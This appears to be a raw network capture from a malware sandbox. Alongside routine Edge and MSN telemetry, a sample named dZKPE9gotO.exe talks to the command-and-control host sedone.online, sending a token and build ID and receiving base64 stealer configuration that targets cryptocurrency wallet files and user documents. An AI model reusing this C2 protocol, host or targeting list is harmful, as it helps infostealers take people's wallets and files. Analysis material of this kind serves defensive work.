                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1
                                                                                                                                                                                                                                                2024-12-16 14:40:19 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Location: https://c.bing.com/c.gif?rnd=1734365264027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=14874f7f2a824b9dbbfbe14fe01fe973&activityId=14874f7f2a824b9dbbfbe14fe01fe973&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B76581ECD2E1499D95A0E1CBD8614B37&RedC=c.msn.com&MXFR=360240197938679F2CDC554E78216658
                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                Set-Cookie: MUID=360240197938679F2CDC554E78216658; domain=.msn.com; expires=Sat, 10-Jan-2026 14:40:18 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:18 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                31192.168.2.74988018.173.219.844435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:18 UTC925OUTGET /b?rn=1734365264028&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=360240197938679F2CDC554E78216658&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                2024-12-16 14:40:18 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:18 GMT
                                                                                                                                                                                                                                                Location: /b2?rn=1734365264028&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=360240197938679F2CDC554E78216658&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                set-cookie: UID=196c9ae1eb685612d5282a91734360018; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                set-cookie: XID=196c9ae1eb685612d5282a91734360018; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                Via: 1.1 0ee1fe5fcafe794371111733608557fe.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                                                                                                X-Amz-Cf-Id: iQlaREJ10tJtpzBsO0LoUWOF1MVct9rwd8yHujNYPlGIYAx0stABXQ==


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                32192.168.2.749916116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:19 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----7QQIEKNGVAAAAIE3O8Q1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:19 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------7QQIEKNGVAAAAIE3O8Q1Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------7QQIEKNGVAAAAIE3O8Q1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------7QQIEKNGVAAAAIE3O8Q1Cont
                                                                                                                                                                                                                                                2024-12-16 14:40:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:20 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                33192.168.2.74991818.173.219.844435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:20 UTC1012OUTGET /b2?rn=1734365264028&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=360240197938679F2CDC554E78216658&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: UID=196c9ae1eb685612d5282a91734360018; XID=196c9ae1eb685612d5282a91734360018
                                                                                                                                                                                                                                                2024-12-16 14:40:20 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:20 GMT
                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                Via: 1.1 73c72f4ba985fa512968a14b5bd2f576.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                                                                                                X-Amz-Cf-Id: T1zNWA466VlayLKSX8GRaOpMmC3kdur_JvHpc18MAWW74E1irR8YFg==


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                34192.168.2.74991713.69.239.724435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:20 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365264026&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 3811
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1
                                                                                                                                                                                                                                                2024-12-16 14:40:20 UTC3811OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 36 54 31 36 3a 30 37 3a 34 34 2e 30 32 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 34 31 34 39 61 31 39 2d 30 32 34 39 2d 34 33 66 62 2d 38 39 61 64 2d 66 32 38 64 61 36 31 30 36 66 37 62 22 2c 22 65 70 6f 63 68 22 3a 22 31 31 38 35 35 33 37 32 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-16T16:07:44.021Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"locale"
                                                                                                                                                                                                                                                2024-12-16 14:40:21 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=628addd364d544158ecfe88b1db7f63b&HASH=628a&LV=202412&V=4&LU=1734360020728; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:20 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=43070b31d739452485dbe2f9b0962537; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:20 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5243298
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:20 GMT
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                35192.168.2.74993020.110.205.1194435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:21 UTC1261OUTGET /c.gif?rnd=1734365264027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=14874f7f2a824b9dbbfbe14fe01fe973&activityId=14874f7f2a824b9dbbfbe14fe01fe973&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B76581ECD2E1499D95A0E1CBD8614B37&MUID=360240197938679F2CDC554E78216658 HTTP/1.1
                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                2024-12-16 14:40:21 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                Set-Cookie: MUID=360240197938679F2CDC554E78216658; domain=.msn.com; expires=Sat, 10-Jan-2026 14:40:21 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                Set-Cookie: SRM_M=360240197938679F2CDC554E78216658; domain=c.msn.com; expires=Sat, 10-Jan-2026 14:40:21 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 23-Dec-2024 14:40:21 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 16-Dec-2024 14:50:21 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:21 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Content-Length: 42
                                                                                                                                                                                                                                                2024-12-16 14:40:21 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                36192.168.2.749937116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:22 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DBA168GLN7QIEUAAIWBI
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:22 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------DBA168GLN7QIEUAAIWBIContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------DBA168GLN7QIEUAAIWBIContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------DBA168GLN7QIEUAAIWBICont
                                                                                                                                                                                                                                                2024-12-16 14:40:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:23 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:23 UTC536INData Raw: 32 30 63 0d 0a 5a 47 6c 7a 66 43 56 45 55 6b 6c 57 52 56 39 47 53 56 68 46 52 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 63 6d 56 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 64 58 4e 38 4a 56 56 54 52 56 4a 51 55 6b 39 47 53 55 78 46 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 71 63 47 63 73 4b 69 35 71 63 47 56 6e 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 78 45 5a 57 5a 68 64 57 78 30 66 43 56 45 54 30 4e 56 54 55
                                                                                                                                                                                                                                                Data Ascii: 20cZGlzfCVEUklWRV9GSVhFRCVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8cmV8JURSSVZFX1JFTU9WQUJMRSVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8dXN8JVVTRVJQUk9GSUxFJVx8Ki50eHQsKi5qcGcsKi5qcGVnfDUwfGZhbHNlfCp3aW5kb3dzKnxEZWZhdWx0fCVET0NVTU


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                37192.168.2.749950116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:24 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----YCB1NOPHVKFUAI5XB1VS
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1825
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:24 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 59 43 42 31 4e 4f 50 48 56 4b 46 55 41 49 35 58 42 31 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 59 43 42 31 4e 4f 50 48 56 4b 46 55 41 49 35 58 42 31 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 59 43 42 31 4e 4f 50 48 56 4b 46 55 41 49 35 58 42 31 56 53 0d 0a 43 6f 6e 74
